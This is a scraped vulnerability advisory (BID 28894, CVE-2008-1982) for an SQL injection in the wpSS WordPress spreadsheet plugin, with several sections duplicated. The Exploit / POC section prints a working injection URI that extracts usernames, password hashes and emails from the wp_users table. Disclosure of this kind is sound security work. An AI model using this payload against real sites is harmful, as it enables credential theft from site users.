WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
BID:28894
Info
WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 28894 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1982 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 22 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | 1ten0.0net1 |
| Vulnerable: |
wpSS wpSS 0.6 |
| Not Vulnerable: | |
Discussion
WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects wpSS 0.6 and prior versions.
The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects wpSS 0.6 and prior versions.
Exploit / POC
WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
Solution / Fix
WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
WordPress wpSS Spreadsheet Plugin 'ss_id' Parameter SQL Injection Vulnerability
References:
References:
- Wordpress church_admin Plugin "id" Cross-Site Scripting Vulnerability (Sammy Forgit)
- wpSS Homepage (wpSS)